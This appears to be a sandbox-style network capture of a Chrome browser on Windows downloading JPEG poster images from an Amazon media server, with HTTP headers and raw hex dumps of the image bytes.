                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 0e c2 b2 c7 4b 2d 29 65 85 61 61 50 5a 54
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3K-)eaaPZT
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: 70 15 36 c7 2b aa ba aa b4 60 86 08 68 00 00 43 13 04 c0 06 21 84 41 88 65 26 10 9a 90 86 09 0c 44 81 42 71 21 0b 02 ca ad a8 b8 00 00 11 a0 5d f1 c3 db 37 da 06 a2 f3 db 9c 2f 74 d2 7c c9 2f 4c 6b 79 83 b9 23 e7 07 a4 1c 0f 7d 63 3c c7 d2 96 c3 55 ab 4e a4 d2 5a 9b 75 a8 e5 1a f4 23 13 2d 80 19 10 44 42 44 a1 28 16 80 00 0b 98 e9 d2 f9 66 7f a0 93 a5 1c 2f a0 0c 79 8f 7b b1 1a e1 f1 fd 02 2b ca f3 7e 9c 8b fc 8b d5 84 ab 9e ea 0b 8e 5b 96 f5 22 74 e6 f5 3d ea 4e 5f 5b dd 48 d3 f9 87 b3 8b af d9 05 e4 00 11 9c 05 65 76 05 56 d2 5a 00 26 c8 8c 2b 56 85 2a f0 c6 8e 58 61 c7 38 35 eb 62 1a c7 b2 0d 69 b2 0d 7b cf 0c 19 e5 33 1a 57 b2 89 5b 10 18 20 07 5c e2 16 57 60 53 75 45 83 21 29 21 0c 10 c1 3a d1 69 5a 2d 2b b0 00 01 40 b0 84 0b 8a 5a da a3 12 d7 54 ec
                                                                                                                                                                                          Data Ascii: p6+`hC!Ae&DBq!]7/t|/Lky#}c<UNZu#-DBD(f/y{+~["t=N_[HevVZ&+V*Xa85bi{3W[ \W`SuE!)!:iZ-+@ZT
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: 00 e1 4b c2 09 f0 07 a9 a8 ac 84 40 28 ac 9b ba 01 3d 3d 57 fd f8 0e b1 ec 7b 4e 68 78 21 d3 78 45 34 bc cd e5 93 73 a7 37 81 d4 c4 33 61 64 1a 4a b7 a2 83 c3 a6 aa fb 69 e8 23 80 27 44 d7 72 68 c7 4d 82 c8 c2 d4 ff 00 0f 61 43 c3 48 28 52 59 08 3f bb a9 89 e2 aa 9d f1 b4 93 56 6e f2 99 41 3b f7 03 a4 70 ef de c8 d0 ad 85 45 0c 35 17 d4 a9 f2 c0 3b c3 0f 95 f7 fe 6d 27 84 53 d2 9b b7 dc 0c 0d e1 0e 02 38 76 3e 0c 70 11 c3 b1 f0 63 80 8e 1d 8f 83 1c 04 70 ec 7c 18 e0 23 87 63 e0 c7 03 1e fe 0c 70 11 c3 bf 82 28 70 11 c3 bf 83 1d 23 87 7f 04 50 e9 1c 3b f8 22 87 48 8c 3b f6 e4 90 b0 ad 76 ec 8d 40 5a e3 84 67 6e e8 ce 05 97 d4 0b 9b eb 00 51 9c 58 96 fd 4f 0b ea 1a 41 b6 b8 1c 8a 91 ba 06 fb fb 45 0e 91 c3 bf 72 c1 59 39 ad 3c ec ac ac 15 95 96 50 ac d0 ac
                                                                                                                                                                                          Data Ascii: K@(==W{Nhx!xE4s73adJi#'DrhMaCH(RY?VnA;pE5;m'S8v>pcp|#cp(p#P;"H;v@ZgnQXOAErY9<P
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: a3 27 07 35 1d 17 35 26 a5 a4 e3 57 2d 19 45 29 3e 37 8e 43 8a ab 16 83 70 e4 f8 23 2c 64 a4 4b a9 73 72 ca 33 c6 ea 5a ee 50 51 94 7a 97 1c 69 75 15 9a 21 af 84 66 85 24 9d b5 d5 4a a7 19 f3 fe 1c 72 e5 5c 6f 4d 47 a8 c7 4d e9 fd ca ee af e5 7f ff c4 00 39 10 00 02 00 02 06 07 06 05 02 07 01 00 00 00 00 00 00 01 02 11 21 31 41 51 61 91 03 10 12 20 30 50 b1 40 52 71 81 a1 c1 22 32 42 60 d1 72 f0 23 53 82 92 a2 e1 f1 b2 ff da 00 08 01 01 00 09 3f 02 e5 0c 63 18 c6 31 8c 63 18 c6 31 8c 63 18 c6 31 8c 63 18 c6 31 8c 7b 98 f2 6c 79 36 3c 9b 1d ca 68 f7 2d 86 2c eb 5e 42 bf d2 be 82 ad b1 52 ac c4 55 c3 3f 71 1f 57 fd 2a d9 6f 29 08 fd d6 29 34 ed 14 eb c2 ab 05 43 53 99 dc 51 7e 45 f3 7b 8a 74 b9 59 50 a6 a2 65 93 b2 ea 7a 0a ff 00 41 7d 11 bc 8f a4 56 53 85
                                                                                                                                                                                          Data Ascii: '55&W-E)>7Cp#,dKsr3ZPQziu!f$Jr\oMGM9!1AQa 0P@Rq"2B`r#S?c1c1c1c1{ly6<h-,^BRU?qW*o))4CSQ~E{tYPezA}VS
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: d6 1a bf cf a5 13 41 73 2c 3e 88 9c 10 d9 ac 22 d1 c0 b1 0e 46 a3 9a 00 2c 07 bd a5 51 84 72 56 37 9f 9d e8 94 e4 5f 24 e6 c0 77 de 7e d0 26 02 04 43 5d 0a d9 ba 73 e9 b2 9c 96 c9 b9 51 84 17 18 13 6e e9 cd 82 f5 8e 5f 49 d7 8c e0 a3 42 64 29 61 a8 c9 00 50 2a 36 9f b9 57 6d e8 ac f5 4a 25 77 19 77 8a bd 75 40 a0 40 b8 c3 9a 33 03 7a 2b 62 3e c4 96 ab 72 eb ba 76 63 3d 71 e2 6d 5b 41 c0 11 d8 e8 f8 23 42 b6 03 80 23 b1 d1 f0 46 85 6d 07 00 47 63 a3 e0 8d 0e 4b 60 38 02 3b 1d 1f 04 6d 5b 40 8a 08 ec 74 7c 11 a1 5b 01 c0 11 d8 e8 f8 2d 1e 1a 4a da 0e 00 8e c7 47 ae 72 cc 27 30 f2 43 a2 09 e4 66 50 0d 12 ef 72 2f 7c 90 77 b8 81 76 6b 51 10 40 24 02 68 1e 4a ab 00 e7 cb ed 62 0a de 9a f2 0f 73 ce 88 80 12 4a 40 2e 46 6a 44 80 5e 4b 2d d6 05 48 27 bb 00 67 0a
                                                                                                                                                                                          Data Ascii: As,>"F,QrV7_$w~&C]sQn_IBd)aP*6WmJ%wwu@@3z+b>rvc=qm[A#B#FmGcK`8;m[@t|[-JGr'0CfPr/|wvkQ@$hJbsJ@.FjD^K-H'g
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: c7 63 23 d3 e0 8d 0e 4a 8c 83 8a ce 6f b1 f0 54 1c 8a da 04 78 58 cd d3 d4 5b 98 9d 1c 41 e5 46 59 8a 48 92 1e 90 77 55 86 3c 73 fc 07 47 34 60 a9 18 00 66 50 e6 05 40 74 01 67 0b 8c 60 4d 09 46 e1 44 4c 76 c6 ad d7 e1 b5 12 d1 17 49 24 c0 00 5a 49 a2 33 72 32 a9 9e 68 a6 d0 c1 35 1a f3 66 c1 30 a9 30 16 45 90 c6 c3 1c 23 a0 45 b8 c1 dd 39 a6 0e 11 93 60 ca 6f 00 b9 8f 13 47 c1 8b 5e 98 4a f8 98 6c 8c 50 2f 90 30 87 88 73 66 28 99 b1 22 8e 20 5a 8a 41 2a 02 1f 69 b7 c0 b2 48 80 4e 1e 93 43 91 54 e4 09 b8 58 cd ea a7 02 48 40 00 e4 92 21 90 c9 b2 45 8f 6d 85 34 e3 6b 96 4b 93 d9 06 01 84 26 92 70 62 63 5a 59 3a 98 27 1b 61 92 fd ac 20 11 17 5a 33 80 a6 7c 12 28 a4 80 12 0e 6c a1 03 0a 2b b1 75 92 d2 37 06 55 ab f7 3b 10 da 44 4e 29 35 aa 70 18 40 1c 62 0d
                                                                                                                                                                                          Data Ascii: c#JoTxX[AFYHwU<sG4`fP@tg`MFDLvI$ZI3r2h5f00E#E9`oG^JlP/0sf(" ZA*iHNCTXH@!Em4kK&pbcZY:'a Z3|(l+u7U;DN)5p@b
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: 14 67 56 f4 34 52 32 98 3a 80 d0 d2 f7 61 61 69 94 0f 63 4a c7 26 b7 98 c8 dc 45 73 2e 6f a4 34 6d 39 5e eb 62 44 3b 5b 43 d0 91 69 67 35 d0 6e 51 98 c1 80 50 66 c0 c5 b5 34 07 9d 45 f1 6c 58 8d 0b 58 76 2e 87 42 41 15 e4 ac d2 d2 d6 5a 3a 32 d6 b3 09 81 72 4e 4d df 32 90 2b 9b 6e a6 04 ec 37 7d b6 2c ee 90 4e 39 7b 0c f3 7d 08 b3 07 16 33 c1 72 89 43 04 03 75 7b ab cc bc 29 6a 21 2d 87 f8 4d eb c8 e4 3a 2b f4 d7 b2 cb 2b 6b be 5e 6d be 72 f7 2e 38 9d 01 31 a4 28 fb 98 7b 40 a9 0b 38 1a cd de 3b db ef 72 da 75 b7 75 de ef df 07 c1 1f f5 93 46 6b 5f 1c ba 4d 53 06 cb aa 8f 62 85 9c ea 50 ce f7 4d 9a bb 83 21 ca 34 1d 97 fa b7 e5 8d 0d 14 de 56 12 df dd 65 dc bc 4d b7 4b dd fe db 97 65 00 68 ab 12 cf 65 2b dd 86 8f 14 00 16 28 fd 8c 11 74 c9 15 ba 5d a9 6f
                                                                                                                                                                                          Data Ascii: gV4R2:aaicJ&Es.o4m9^bD;[Cig5nQPf4ElXXv.BAZ:2rNM2+n7},N9{}3rCu{)j!-M:++k^mr.81({@8;ruuFk_MSbPM!4VeMKehe+(t]o
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: b8 06 11 92 9d cd 9b 76 b3 24 aa b1 45 b4 5d d1 e8 dc 85 ef 46 c6 95 b1 c0 2c 34 d5 6e 29 ea 09 49 d8 ef 2a 0b 85 45 d0 df 21 97 32 e4 b3 dd ec 94 03 ac ed 89 43 bd e5 63 dc 64 13 3d fb a3 85 c8 1d e3 57 ce 1d 62 4a c3 1c 79 27 da bd f8 4f c3 f5 27 9c e9 c2 71 79 8f a1 e2 47 82 8d e8 fc c0 0d 6f bd 41 0b 2b fd f4 ae bd c7 78 29 31 81 8c 62 b0 54 11 0a e0 1f 8b 8a e8 29 e9 1f 96 3b 7f 1c 45 8a 7b 57 1d ae 08 32 b8 a2 cf b2 ed 0d 0a 8c b0 35 b5 9e 7e 2a 86 1b d1 85 4e 63 3c ed f5 21 92 a6 20 81 ab d4 65 9e 5f a9 3c e7 48 c1 84 20 1a e5 7a 6a df 61 43 da 79 f1 32 0c 09 6c 6b 5f 12 d8 47 42 81 e8 d8 4a 95 2a 27 0a 84 31 e1 70 7d 62 be 15 c4 54 fd 92 8b aa 02 88 b9 78 e1 f9 3b 92 b3 60 4a 31 87 91 31 2d e3 36 4e 45 3f 0e 75 05 2f 18 1c 44 31 55 37 63 4f 33 73
                                                                                                                                                                                          Data Ascii: v$E]F,4n)I*E!2Ccd=WbJy'O'qyGoA+x)1bT);E{W25~*Nc<! e_<H zjaCy2lk_GBJ*'1p}bTx;`J11-6NE?u/D1U7cO3s
                                                                                                                                                                                          2024-12-15 11:38:10 UTC1378INData Raw: a8 73 58 78 53 03 74 a2 14 b1 53 91 86 59 10 82 f0 54 8e cf 9d aa e5 50 13 18 70 5a 8e 56 b0 05 b2 d5 46 14 3e c1 54 e1 3c cb 8f b6 1a a8 02 08 82 26 44 74 8c cd 8f 16 de 80 1c d5 c0 4a 39 2b 30 2b 25 ed 7a 81 69 69 65 e4 6a 82 fc ca c1 12 e5 08 ae 25 16 aa 5a 99 4a bf 14 22 88 07 97 b2 32 d3 d4 48 96 d3 17 78 42 16 2b 75 44 5b 42 e8 b7 d3 e7 3a 41 e4 72 8d e1 1f 23 a9 c3 71 e2 db 03 8e 7b 00 05 56 1d 63 8d 1b 54 6d 14 f6 a9 76 c5 a6 c4 60 0f ec 83 de 4d 70 b9 a2 57 b9 57 2f 66 95 a4 d2 a0 38 7c af 3a 67 89 6b ae 1f 73 7d d1 bc 42 de b8 80 0e 1e 7a 63 2a 04 06 79 10 96 00 b9 63 e3 96 d2 f3 f4 08 98 e4 5e 29 9a 44 b2 96 aa dd 1b 61 98 fd 4b f8 c6 39 cb a2 e1 a1 81 55 da c8 1a 60 42 49 cc a3 56 5a ae 56 ca 33 72 ee ae 96 0a 13 b2 61 50 40 40 5b 0c ea c2 ed
                                                                                                                                                                                          Data Ascii: sXxStSYTPpZVF>T<&DtJ9+0+%ziiej%ZJ"2HxB+uD[B:Ar#q{VcTmv`MpWW/f8|:gks}Bzc*yc^)DaK9U`BIVZV3raP@@[
                                                                                                                                                                                          2024-12-15 11:38:10 UTC288INData Raw: f1 02 c8 07 89 fa 80 ab f1 3d a7 83 7f 92 97 5e 57 b4 af 89 fa 8f 81 7e a5 3c 4f d4 4b 67 93 b4 a7 89 fa 9e 0d fe 41 1a f1 fd a7 2a bc 9d a7 6b cd da 53 cb c9 da 52 78 7f 13 b7 e4 ed 10 3c ff 00 89 8e eb c9 da 0b cb c9 da 78 7f 84 a3 68 f1 e9 33 d7 9f ed 1c 46 5a 36 e3 da 14 0e 13 f5 7f e1 be 37 c2 f8 5c b9 72 e5 cb 97 2e 5c b9 72 e5 cb ff 00 f2 7f ff c4 00 1b 11 00 01 04 03 00 00 00 00 00 00 00 00 00 00 00 00 01 00 31 50 60 40 70 71 ff da 00 08 01 02 01 09 3f 00 be 84 22 4c 33 61 0d a3 cb bf ff c4 00 2a 11 00 02 00 05 01 04 0b 00 00 00 00 00 00 00 00 00 00 01 11 12 21 31 41 71 02 10 22 51 20 30 32 50 60 61 80 81 a1 c1 f1 ff da 00 08 01 03 01 09 3f 00 ee b5 d1 5e 7b f4 11 af a5 dd 0c 70 bd fd 98 ca 59 18 53 33 3c 48 b3 2d 61 96 8c bd 46 2a 2a 37 37 e1 7b
                                                                                                                                                                                          Data Ascii: =^W~<OKgA*kSRx<xh3FZ67\r.\r1P`@pq?"L3a*!1Aq"Q 02P`a?^{pYS3<H-aF**77{


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          84192.168.2.1649818151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:10 UTC684OUTGET /images/M/MV5BOGMyNWJhZmYtNGQxYi00Y2ZjLWJmNjktNTgzZWJjOTg4YjM3L2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:11 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 36494
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: eef56ae8-0241-4424-a8f7-1b35f508d26c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 01 Feb 2017 18:19:00 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 22:39:49 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2835624
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:10 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200067-IAD, cache-ewr-kewr1740071-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 cc 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 00 01 02 08 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f4 fe 6f 03 9e b3 a0 e7 3a c0 e7 37 b0 d6 f7
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3o:7
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 55 43 d9 3c 61 c4 d1 7f 86 36 e9 c7 59 ac 58 cc bd 1f 17 88 59 b5 69 68 b4 9c 7e d0 e3 af a0 55 49 5f 5b 99 2a 2a f5 a8 4d f1 72 32 b8 d8 72 ab 87 fb 89 9b 7a 7a 3a c0 5c 9e cc 95 69 69 98 22 a6 ae 75 02 18 cb 22 e9 bb ad 77 68 42 ed 3a 48 48 f9 a4 2d 34 98 63 31 83 22 71 82 bd 74 49 c4 4a 43 0d 61 91 80 52 60 4d 2b 0e 55 1a b1 b1 19 f5 e7 5d d8 f1 8b e0 3f be c6 55 3d 3a a2 4a fa 31 4a a1 b7 a9 5c df 27 b1 3a f3 00 73 01 26 94 88 48 3a 89 ab 4f dd 6a 47 cf d3 0a b1 01 99 d8 92 d8 52 da ef 16 49 46 c8 7e 6d ad b9 ee 28 35 93 5e 9a ac 59 68 d0 a4 87 8c e6 99 c3 4e b5 a3 89 bb e9 34 28 5f 91 28 f3 50 d2 8c 9d 46 81 07 9e 8b 98 e0 70 f7 0c be b1 5b 85 7d 38 25 52 5b b5 8a 37 95 b7 34 af 66 d8 b4 79 6a a2 33 40 c5 c2 cd 8d 31 b7 e4 f0 07 81 15 93 28 78 7b dc
                                                                                                                                                                                          Data Ascii: UC<a6YXYih~UI_[**Mr2rzz:\ii"u"whB:HH-4c1"qtIJCaR`M+U]?U=:J1J\':s&H:OjGRIF~m(5^YhN4(_(PFp[}8%R[74fyj3@1(x{
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 32 a0 35 b0 2d 83 77 a1 1c cc 0c cc c0 cc cc 0c ce 44 81 8c 88 f0 13 1c 86 a2 13 74 62 ac 40 c4 92 33 25 0f ff c4 00 31 10 00 02 02 01 03 03 04 01 03 04 02 03 01 01 00 00 01 02 00 03 11 04 12 21 10 13 31 05 22 32 41 14 23 33 51 15 20 30 42 24 40 06 61 71 34 50 ff da 00 08 01 01 00 01 08 02 ff 00 f9 d8 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 ff 00 37 a9 bb 22 a6 de f5 a6 35 d7 4f ca b4 46 b6 d6 19 1d fb a0 be d9 de b2 77 ec 9d d7 9d cb 27 75 e1 ba c9 dd b2 77 1e 52 ed bb 11 99 a3 3b 4d ed 16 d3 37 99 b8 c0 22 73 36 63 ab 38 5f 29 60 62 40 db 0a cc 4c 4c 4c 41 f5 d7 d6 3e 15 c5 33 e5 2d aa 29 c4 c6 f8 57 11 fa 03 8e a0 4c 79 9e 20 25 48 2a 9a 9d df 26 e8 04 58 16 62 50 82 08 7a 5c 3f 5a 93 1f 77 7e b2 45 ea 73 0e a5 67 74 08 b7 86 20 75 1d 7d 5f
                                                                                                                                                                                          Data Ascii: 25-wDtb@3%1!1"2A#3Q 0B$@aq4P7"5OFw'uwR;M7"s6c8_)`b@LLLA>3-)WLy %H*&XbPz\?Zw~Esgt u}_
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: e2 5b 2e fb bb 5f 9d 66 38 d2 51 b0 ef 39 9a 93 ff 00 29 e5 27 72 0c 62 6a e8 de 01 14 6a 1f 89 94 bd 7b 95 e3 a1 99 89 cc fc 60 81 4b 5b b3 dd 2b da 4c 22 bf 9c db 5a c4 d8 49 59 b1 43 08 d0 c4 f8 af 5f 5f fd aa e7 98 dd 4d 67 89 da 87 6a 71 16 cf a8 34 d9 07 71 a7 95 02 dd 47 77 20 6e 2b 13 50 eb cc 7f 52 b0 71 2a b4 5a 40 8f ad ed 1e 07 ac 29 f2 7d 4a a2 26 a9 49 51 6c d3 ea 4a d8 8c cd 66 4f 1b 11 ce 16 c5 2b 0c 4f 31 53 70 20 6d 0b 90 57 69 c8 1d c5 9b 93 e8 58 93 ba b9 8d 18 44 f8 af 5f 5f fd aa e3 40 b3 64 ad 40 8d 76 46 21 db f5 e2 0a 4b c5 de be 36 93 e6 b5 9a 7a 33 c9 03 f8 7e 51 81 1b ab 65 89 ed bc 66 c3 e6 71 1f 9f 37 e9 cd 6d 89 53 31 08 a3 51 51 0d 93 56 a7 c2 b3 d7 b7 cd 35 ee ce 10 2a f0 2c 3b 7c 6f cc cc 33 3d 0c 31 3c 2f 5f 5f fd aa e6
                                                                                                                                                                                          Data Ascii: [._f8Q9)'rbjj{`K[+L"ZIYC__Mgjq4qGw n+PRq*Z@)}J&IQlJfO+O1Sp mWiXD__@d@vF!K6z3~Qefq7mS1QQV5*,;|o3=1</__
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 16 78 98 fb 8d 17 c2 f5 f5 83 fa 69 1b 98 67 8e 61 19 8b ff 00 bd 37 ba c0 16 b1 b3 da ba 95 cd 2e b5 8a 5c 02 59 3f da 2f 1c 44 18 10 10 32 4d b6 92 25 87 84 8d cc d3 fd c7 9a d1 80 a6 79 f7 4f a1 2b e7 33 f8 12 9c 13 b6 5c 08 38 09 bc fb c6 a8 82 c8 63 70 31 10 6e 38 80 7f a8 23 1e 0f 54 f8 af 5f 59 fd a5 99 3c c3 57 f0 b5 34 29 89 b0 f3 00 1c 4a c3 fb 56 33 db 5e 33 f9 28 c0 c3 c7 13 c9 10 1e 23 9f a8 ff 00 cc 6e 14 66 69 f8 2d 0c d4 ae e4 30 f0 b3 6c 5e 9b f1 88 af e1 56 ab 0e f9 af b1 77 85 56 db ce 73 c0 dc 9a ab 37 a8 5b 75 88 87 04 5a b6 fc 44 31 3e 2b d7 d6 bf 69 23 71 37 95 30 58 d1 58 af 22 8b 82 e4 32 76 c6 e1 05 ab a7 4c 20 3b d7 2d 65 65 5b 05 d0 e6 03 f5 0f d8 96 73 c8 68 47 88 de 65 1f 32 21 8c 37 8c 46 fa 10 8f 13 38 8a 73 2c af f8 54 89
                                                                                                                                                                                          Data Ascii: xiga7.\Y?/D2M%yO+3\8cp1n8#T_Y<W4)JV3^3(#nfi-0l^VwVs7[uZD1>+i#q70XX"2vL ;-ee[shGe2!7F8s,T
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 29 5b f7 06 e9 af f4 f1 6e 6c 4f cd fc 81 da d5 59 e9 69 6a 25 72 df 4f ee 8c 35 da 0a 34 61 5d c6 8c ea 88 b3 53 81 fd 47 02 bf 4d b3 4a d9 d3 b7 a6 9b dc 3d ff 00 f5 cf f7 ea 34 35 6a 0e e7 fe 91 a7 fa d3 e9 85 39 c5 17 8b 75 c4 d8 cc 10 12 da 15 37 dd 66 ab fe a1 38 06 7e a6 dc 4f d4 cc af 7f bb 70 ee 0d b0 77 b6 88 c1 fd d8 b0 59 ce df d5 f7 41 dc e2 20 7f f6 5e ef b7 35 f7 72 37 75 d5 7a 52 5e 4b 84 f4 ee 07 7b fc 84 85 04 92 c0 1c 4d e3 38 9b c6 76 c0 ea 7c 1e 21 70 3c f7 96 77 17 93 0b 01 c1 b4 87 db 87 af 0e c6 6c f6 30 9b 50 10 c1 aa 18 81 01 2d 9e d6 61 a4 59 98 68 63 89 4d 7d b5 09 0b 81 9c ef 10 5a a6 77 16 77 16 6f 10 da 82 1b 14 67 3b c4 07 3e 3f bb ba bc ce f2 4b 19 1f 88 fb 09 0c 76 8d f9 16 5b 5d 9e e2 15 37 08 b5 a2 ed db 55 a9 56 42 84
                                                                                                                                                                                          Data Ascii: )[nlOYij%rO54a]SGMJ=45j9u7f8~OpwYA ^5r7uzR^K{M8v|!p<wl0P-aYhcM}Zwwog;>?Kv[]7UVB
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 5d 28 4a df ab fd a6 22 ea 5c dc ad 98 1a fa 6f cc 02 aa 13 b8 0f 52 ee a1 c9 46 64 62 c6 26 c1 83 18 b8 f4 ba 97 70 77 04 6e 8c 17 0f 28 3a 8d 88 30 30 71 4b 00 1d ca b9 42 e0 5d c3 a3 19 a5 ee 07 0b 65 40 66 3c e7 20 49 04 e1 e2 20 6b 83 a9 90 fc 0c 5c bf 99 ee 03 b0 1c 41 33 a0 0e 22 ac 59 44 c2 6a 18 f0 83 0f e0 c5 0a 77 2c 03 0b d9 97 f2 30 75 32 fd 8d 39 d7 61 b8 88 32 ef 43 c9 71 3d d6 2f 64 66 8a e2 e0 78 4c 0d 51 9a e5 18 cf 5a 0a c4 28 e4 cd 66 e0 1a b8 5f e5 70 75 e8 71 21 ec f8 38 8c 7f 0b fe 87 c6 cd 5a 3e 26 50 6e 07 3d 30 c8 47 6b 92 e8 c2 e6 c4 66 a4 31 17 29 17 19 ce b9 1b 2d a3 e4 51 a8 33 d9 a3 91 aa 84 06 0e 87 ef 2a 0f 7e ca 91 53 e9 94 68 12 ca dc 59 30 80 b6 c3 22 9e 86 54 7d 2b 78 78 da 1f d3 8d eb fa 6e 43 0f 8d 98 58 23 c5 cb ca
                                                                                                                                                                                          Data Ascii: ](J"\oRFdb&pwn(:00qKB]e@f< I k\A3"YDjw,0u29a2Cq=/dfxLQZ(f_puq!8Z>&Pn=0Gkf1)-Q3*~ShY0"T}+xxnCX#
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 1c 5f 72 8e 2f b8 a8 e2 fb 8a f1 22 fb 8a f1 22 fb 8a 8e 2f b8 a8 e2 fb 8a 8e 2f b8 a8 e2 fb 8a 88 fd c5 44 7e e2 a3 8b ee 2a 38 be e2 a3 8b ee 2a 23 bc a2 77 a8 8e f5 11 de 89 de 8f c0 ae 14 f8 5e ae 99 b5 f8 63 76 75 33 69 e6 0f a4 af a4 44 ed 39 1a 3e b2 ae 5d de b4 f0 57 fe f3 bd 5d 3e 28 cc bb e1 07 7a ea 50 c9 f5 77 25 0f 7f 8e 28 20 83 63 9d ea f8 70 0d 6a 56 cd a8 80 a7 c1 dd ee 8d 2a 8d 38 a8 9d 47 df 72 51 5c a2 ef bb d4 4e cd 9d ea e9 f0 88 9d b5 5b 56 e0 a4 ee fd 1f 32 7a 10 b3 e5 15 38 7e 50 61 73 fd 4a fa ae e4 c8 b7 2f 55 14 55 0b f7 95 3f d2 3d d7 5d f5 46 9d e0 b1 39 de ae 9f 0e 59 97 aa 1b 90 ce a4 1f 2f 87 71 d7 ed 7a 9d a2 40 85 0f 6f f9 50 a8 7b a2 86 52 ec 28 71 ce f5 74 f8 97 0c e3 98 7d 9a 8c aa 26 fc 25 9a 3b ef 7a 1d ef b3 13 a1
                                                                                                                                                                                          Data Ascii: _r/""//D~*8*#w^cvu3iD9>]W]>(zPw%( cpjV*8GrQ\N[V2z8~PasJ/UU?=]F9Y/qz@oP{R(qt}&%;z
